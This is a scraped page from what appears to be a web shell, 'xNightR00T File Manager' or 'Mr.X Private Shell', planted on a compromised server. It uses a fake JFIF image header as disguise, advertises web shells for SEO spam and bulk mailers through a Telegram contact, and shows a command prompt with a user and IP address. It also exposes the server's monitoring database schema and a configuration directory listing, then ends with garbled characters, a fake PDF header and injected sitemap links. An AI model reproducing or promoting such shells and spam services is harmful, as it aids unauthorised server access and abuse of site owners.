xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
	CREATE TABLE IF NOT EXISTS backtraces (
		id INTEGER NOT NULL  PRIMARY KEY AUTOINCREMENT,
		event_id INTEGER NOT NULL,
		depth INTEGER NOT NULL default '0',
		class_name text,
		object_name text,
		function_name text,
		static_call INTEGER NOT NULL,
		source_file text,
		line INTEGER NOT NULL default '0'
	);

	CREATE TABLE IF NOT EXISTS event_attribute_types (
	  id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	  type_name text NOT NULL
	);


	CREATE TABLE IF NOT EXISTS event_attributes (
	  id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	  event_id INTEGER NOT NULL,
	  attribute_id INTEGER NOT NULL,
	  value_str text
	);


	CREATE TABLE IF NOT EXISTS event_types (
	  id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	  type_name text NOT NULL
	);


	CREATE TABLE IF NOT EXISTS events (
	  event_id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	  issue_id INTEGER NOT NULL,
	  request_id INTEGER NOT NULL,
	  script_id INTEGER NOT NULL,
	  event_type INTEGER NOT NULL,
	  severity INTEGER NOT NULL,
	  agg_key varchar(32) NOT NULL,
	  repeats INTEGER NOT NULL,
	  first_timestamp INTEGER NOT NULL,
	  last_timestamp INTEGER NOT NULL,
	  agg_hint text,
	  extra_data text,
	  tracer_event_num INTEGER NOT NULL default '-1',
	  tracer_dump_file text,
	  node_id INTEGER,
	  cluster_issue_id INTEGER NOT NULL,
	  app_id INTEGER NOT NULL default -1
	);

	CREATE TABLE IF NOT EXISTS cluster_issues (
	  id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	  agg_key varchar(32) NOT NULL UNIQUE
	);

	CREATE TABLE IF NOT EXISTS func_args (
	  id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	  event_id INTEGER NOT NULL,
	  argno INTEGER zerofill NOT NULL,
	  argvalue text
	);
	
	CREATE TABLE IF NOT EXISTS request_components (
		id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
		cluster_issue_id INTEGER NOT NULL,
		comp_name varchar(128) NOT NULL,
		comp_value varchar(128),
		unique_hash TINYBLOB NOT NULL		
	);
	CREATE UNIQUE INDEX IDX_MONITOR_ROUTE_HASH on request_components (unique_hash);

	CREATE TABLE IF NOT EXISTS requests (
	  id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	  host INTEGER zerofill NOT NULL,
	  https INTEGER zerofill default NULL,
	  full_url text,
	  get text,
	  post text,
	  cookie text,
	  var_server text,
	  session text,
	  uri text,
	  raw_post_data text,
	  files text,
	  env text,
      php_version varchar(32)
	);
    CREATE INDEX REQUEST_PHP_VERSION_IDX on requests(php_version);

	CREATE TABLE IF NOT EXISTS scripts (
	  id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	  script_name text
	);

	CREATE TABLE IF NOT EXISTS vhosts (
	  id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	  vhost_name text NOT NULL
	);

	CREATE TABLE IF NOT EXISTS matched_rules (
	  event_id INTEGER NOT NULL PRIMARY KEY,
	  id INTEGER NOT NULL,
	  rule_name text,
	  rule_description text
	);

	CREATE TABLE IF NOT EXISTS event_tags (
	  event_id INTEGER NOT NULL PRIMARY KEY,
	  tag text
	);
	
	CREATE TABLE IF NOT EXISTS events_jobs (
	  event_id INTEGER NOT NULL PRIMARY KEY,
	  job_id INTEGER
	);
	
	CREATE TABLE IF NOT EXISTS event_actions(
	  event_id INTEGER NOT NULL PRIMARY KEY,
	  url varchar(256) DEFAULT NULL,
	  email varchar(128) DEFAULT NULL
	);

	CREATE TABLE IF NOT EXISTS issues (
		id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
		agg_key varchar(32) NOT NULL,
		node_id INTEGER,
		rule_name text NOT NULL,
		event_type INTEGER NOT NULL,
		severity INTEGER NOT NULL,
		repeats INTEGER NOT NULL,
		first_timestamp INTEGER NOT NULL,
		last_timestamp INTEGER NOT NULL,
		agg_hint text,
		full_url text NOT NULL,
		function_name text,
		file_name text,
		line INTEGER,
		events_per_hour INTEGER NOT NULL default '0',
		status INTEGER NOT NULL,
		cluster_issue_id INTEGER NOT NULL
	);

	CREATE TABLE IF NOT EXISTS version (
		key string primary key,
		version string
	);

	CREATE TABLE IF NOT EXISTS request_uid_to_event_id (
		request_id_str TEXT,
		request_id INTEGER,
		event_id   INTEGER,
		last_updated INTEGER
	);
	
	CREATE INDEX IF NOT EXISTS REQUEST_UID_TO_EVENT_ID_IDX1 on request_uid_to_event_id(request_id_str);
	CREATE INDEX IF NOT EXISTS REQUEST_UID_TO_EVENT_ID_IDX2 on request_uid_to_event_id(request_id);
	CREATE INDEX IF NOT EXISTS REQUEST_UID_TO_EVENT_ID_IDX3 on request_uid_to_event_id(last_updated);
	
	CREATE INDEX IF NOT EXISTS REQUEST_COMPONENTS_IDX on request_components(comp_value);
	CREATE INDEX IF NOT EXISTS REQUEST_COMPONENTS_IDX2 on request_components(cluster_issue_id);
	
	CREATE INDEX IF NOT EXISTS RULE_NAME_IDX on ISSUES(rule_name);
	CREATE INDEX IF NOT EXISTS EVENT_TYPE_IDX on ISSUES(event_type);
	CREATE INDEX IF NOT EXISTS BACKTRACES_EVENT_ID_IDX on BACKTRACES(event_id);
	CREATE INDEX IF NOT EXISTS FUNCARGS_EVENT_ID_IDX on FUNC_ARGS(event_id);
	CREATE INDEX IF NOT EXISTS EVENT_ATTRIBUTES_EVENT_ID_IDX ON EVENT_ATTRIBUTES(event_id);
	CREATE INDEX IF NOT EXISTS EVENT_FIRST_TIMESTAMP_IDX ON EVENTS(first_timestamp);
	CREATE INDEX IF NOT EXISTS EVENT_LAST_TIMESTAMP_IDX ON EVENTS(last_timestamp);
	
	CREATE INDEX IF NOT EXISTS EVENTS_ISSUE_ID_IDX on EVENTS (issue_id);
	CREATE INDEX IF NOT EXISTS EVENTS_REQUEST_ID on EVENTS (request_id);
	CREATE INDEX IF NOT EXISTS ISSUES_NODE_ID_STATUS_IDX on ISSUES (node_id, status);
	CREATE INDEX IF NOT EXISTS ISSUES_CLUSTER_ISSUE_ID_SEVERITY_IDX ON ISSUES (cluster_issue_id, severity);
	CREATE INDEX IF NOT EXISTS EVENTS_CLUSTER_ISSUE_ID_NODE_LAST_IDX ON EVENTS (cluster_issue_id, node_id, last_timestamp);
	CREATE INDEX IF NOT EXISTS EVENTS_APP_ID_IDX on EVENTS (app_id);
	CREATE INDEX IF NOT EXISTS EVENTS_STATS_IDX on EVENTS (node_id, last_timestamp);
	
	CREATE INDEX IF NOT EXISTS EVENTS_JOBS_IDX on EVENTS_JOBS (job_id);
	
	INSERT OR IGNORE INTO version VALUES('SCHEMA_VERSION', '2019.0.0');
	

Filemanager

Name Type Size Permission Actions
UserServer Folder 0755
azure-plugins Folder 0755
dist Folder 0755
libraries Folder 0755
minify Folder 0755
plugins Folder 0755
scripts Folder 0755
sdk Folder 0755
selinux Folder 0755
support_tool Folder 0775
zray-cleanup-scripts Folder 0755
zs-cli-tools Folder 0755
alias-linux-apache-2.4-fpm.tpl File 385 B 0644
alias-linux-apache-2.4.tpl File 310 B 0644
alias-nginx-root.tpl File 119 B 0644
alias-nginx.tpl File 112 B 0644
alias-pase-apache-2.4.tpl File 211 B 0644
alias-windows-apache-2.4.tpl File 181 B 0644
alias.tpl File 282 B 0644
browser_mysql_create_database.sql File 2.89 KB 0644
browser_sqlite_create_database.sql File 3.17 KB 0644
create_monitor_db.sql File 5.58 KB 0644
create_monitor_rules_db.sql File 1.37 KB 0644
create_monitor_rules_fixtures.sql File 8.36 KB 0644
create_monitor_tracing_db.sql File 906 B 0644
create_pagecache_rules_db.sql File 1.15 KB 0644
deployment.xsd File 11.33 KB 0644
deployment_mysql_create_database.sql File 6.69 KB 0644
deployment_sqlite_create_database.sql File 7.35 KB 0644
devbar_fixtures.sql File 1.27 KB 0644
devbar_mysql_create_database.sql File 7.6 KB 0644
devbar_sqlite_create_database.sql File 8.59 KB 0644
gui_ibmi_update_database.sql File 268 B 0644
gui_mysql_acl_fixtures.sql File 19 KB 0644
gui_mysql_create_database.sql File 7.29 KB 0644
gui_sqlite_acl_fixtures.sql File 18.34 KB 0644
gui_sqlite_create_database.sql File 7.58 KB 0644
index.php File 18.34 KB 0644
jobqueue_mysql_create_database.sql File 4.8 KB 0644
jobqueue_sqlite_create_database.sql File 4.93 KB 0644
mysql_create_message_center_db.sql File 6.7 KB 0644
mysql_create_monitor_db.sql File 6.64 KB 0644
mysql_create_monitor_rules_db.sql File 1.42 KB 0644
mysql_create_pagecache_rules_db.sql File 1.15 KB 0644
pagecache_purge.sql File 1.51 KB 0644
sqlite_create_message_center_db.sql File 7.28 KB 0644
statistics_mysql_create_database.sql File 4.37 KB 0644
statistics_sqlite_create_database.sql File 4.68 KB 0644
stats_mysql_fixtures.sql File 35.9 KB 0644
stats_sqlite_fixtures.sql File 30.03 KB 0644
statsd_mysql_create_database.sql File 4.59 KB 0644
statsd_sqlite_create_database.sql File 2.61 KB 0644
statsd_sqlite_pagecache_create_database.sql File 2.67 KB 0644
urlinsight_mysql_create_database.sql File 2.58 KB 0644
urlinsight_sqlite_create_database.sql File 2.75 KB 0644
vhost-apache-2.4-fpm.tpl File 832 B 0644
vhost-apache-2.4.tpl File 726 B 0644
vhost-nginx-ssl.tpl File 426 B 0644
vhost-nginx.tpl File 292 B 0644
vhost-pase-apache-2.4.tpl File 480 B 0644
vhost-pase-ssl-apache-2.4.tpl File 536 B 0644
vhost-ssl-apache-2.4-fpm.tpl File 1013 B 0644
vhost-ssl-apache-2.4.tpl File 900 B 0644
vhost-ssl.tpl File 618 B 0644
vhost-windows-ssl-apache-2.4.tpl File 719 B 0644
vhost.tpl File 444 B 0644
zsd_mysql_create_schema.sql File 11.54 KB 0644
zsd_mysql_fixtures.sql File 367 B 0644
zsd_sqlite_create_schema.sql File 11.12 KB 0644
zsd_sqlite_fixtures.sql File 363 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml